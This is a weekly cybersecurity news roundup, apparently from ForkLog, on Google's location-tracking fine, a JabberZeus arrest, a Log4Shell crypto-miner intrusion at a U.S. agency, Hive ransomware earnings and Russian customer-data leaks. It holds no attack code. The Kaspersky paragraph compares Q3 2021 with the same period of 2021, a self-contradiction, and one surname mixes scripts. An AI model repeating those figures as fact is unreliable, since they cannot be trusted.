We round up the week’s most significant cybersecurity news.
- Google will pay $391.5 million for unlawful user tracking.
- In Switzerland, authorities arrested a suspected leader of the Zeus group.
- The U.S. federal agency was attacked with a crypto miner.
- 96% of Russian companies were vulnerable to cyberattacks.
Google to pay $391.5 million for unlawful user tracking
U.S. authorities fined the tech giant Google $391.5 million in a case over unlawful data collection. The Associated Press reports.
During the investigation, it was found that when geolocation was disabled, Google services identified users’ locations through other settings. Among the affected were residents of 40 states.
Location tracking helps tech firms, in particular, selling advertising to marketers. This data-collection tool generates more than $200 billion in annual revenue for Google, AP estimates.
It is also known that location information was used by police to locate suspects.
The geolocation tracking issue affected nearly 2 billion Android users and hundreds of millions of iPhone owners worldwide.
In Switzerland, the suspected Zeus group leader was arrested
Geneva police, acting at the request of the FBI, arrested Ukrainian citizen Vyacheslav Penchukov, described as one of the leaders of the JabberZeus cybercrime group. Bleeping Computer reports, citing the Swiss Federal Office of Justice.
The 40-year-old Penchukov, also known as Tank, was arrested on 23 October. He faces charges of extortion, bank fraud and theft of personal data via the Zeus trojan. He has been sought since 2012.
According to the publication, Penchukov was among suspects arrested by Ukrainian police in January 2021 during an operation against the Egregor ransomware gang. He, however, avoided prosecution at the time thanks to political connections.
Two of his JabberZeus associates, Ukrainian nationals Yevhen Kulibaba and Yuri Konovalенко, pleaded guilty in November 2014 after extradition from the United Kingdom. In May 2015 they were sentenced to two years and ten months in prison.
Penchukov is awaiting extradition to the United States, though he may appeal the decision.
96% of Russian companies were vulnerable to cyberattacks
IT systems of almost all large Russian companies are not protected against intrusion into the local network, according to a Positive Technologies report.
From late 2021 to mid-2022, specialists conducted analysis of 53 projects across 30 organisations. In testing, they achieved full control over the infrastructure in 96% of the companies studied. On average, an attacker could breach the internal network in five days and four hours.
In 90% of cases, the hacker could potentially access confidential information, including trade secrets.
In 85% of organisations, dangerous vulnerabilities linked to weak password policies were identified. Another 60% of firms used outdated software versions.
U.S. agency attacked with a crypto miner
An unnamed hacking group, believed to be backed by Iran, breached the U.S. Federal Civilian Executive Branch (FCEB) to deploy the XMRig crypto miner, according to CISA.
The attackers targeted the VMware Horizon server using the Log4Shell exploit to enable remote code execution.
After deploying the miner, the attackers installed reverse proxy servers in the compromised systems to maintain their presence in the FCEB’s internal network.
CISA urged all organisations that had not protected VMware systems against Log4Shell to search for malicious activity on their networks.
Researchers from Kaspersky Lab noted that in Q3 2021 the number of new miner variants rose sharply, as did the number of affected users. The company’s solutions detected more than 150,000 new malware variants compared with 50,000 in the same period of 2021.
From ForkLog experts noted that the cryptojacking landscape expanded with more capable variants.
FBI estimates Hive earnings after breaches of more than 1,300 companies
Since June 2021 the Hive ransomware group has breached over 1,300 companies and extorted about $100 million from victims, according to the FBI’s report.
According to the agency, victims include government agencies, telecommunications and IT firms. However, healthcare organisations are attacked more than others.
Hive operators frequently deploy additional payloads from other ransomware operators in their victims’ networks if victims refuse to pay.
Since early 2022 victims have sent analysts more than 850 malware samples. Many arrived after a spike in ransomware activity—from late March to mid-April.
Data of 4 million Dom.ru customers goes public
Hackers posted the customer database of the Saint Petersburg-based provider Dom.ru online. Telegram channel “Information Leaks” reports.
The database dates to November 2021. Two tables contain full names, dates of birth, phone numbers, customer comments, parts of the connection address and other details.
Telegram channel suggested that the attacker had access not to the customer database of the operator, but to the registry of incoming requests to connect to the network.
SecurityLab notes that the leak affected 4 million users in total.
Dom.ru representatives told Roskomsvoboda that they are investigating the incident. Roskomnadzor says it did not receive a notification from the provider about the leak.
Separately, unknown hackers published for sale in the dark web data of users of the Russian ride-hailing service Whoosh. The dump was valued at $4,200.
News of the breach emerged last week. The breach was attributed to a security lapse by one former employee of the company. Through him, attackers gained access to “some of the primary data of several million customers,” namely:
- usernames;
- phone numbers;
- email addresses;
- incomplete bank card numbers.
Whoosh representatives confirmed the incident, stressing that only “non-sensitive data” were affected.
ForkLog also features:
- CertiK researchers disclosed the black market for KYC checks.
- The co-founder of Finiko was detained in the UAE.
- In China, the hacker was sentenced to 10.5 years in prison for stealing 383 ETH.
- In SkyRex, losses due to API key compromise were acknowledged.
- DeFi project Flare on BNB Chain was hacked for $17.9 million.
- Unknown actors withdrew more than $400 million from FTX wallets. Subsequently, their wallet appeared on the Ethereum whales list.
What to read this weekend?
One of the means of fighting surveillance and censorship online is the Tor web browser. We explain how it works and how to use it—across educational cards.
Follow ForkLog’s Bitcoin news in our Telegram — cryptocurrency news, prices and analysis.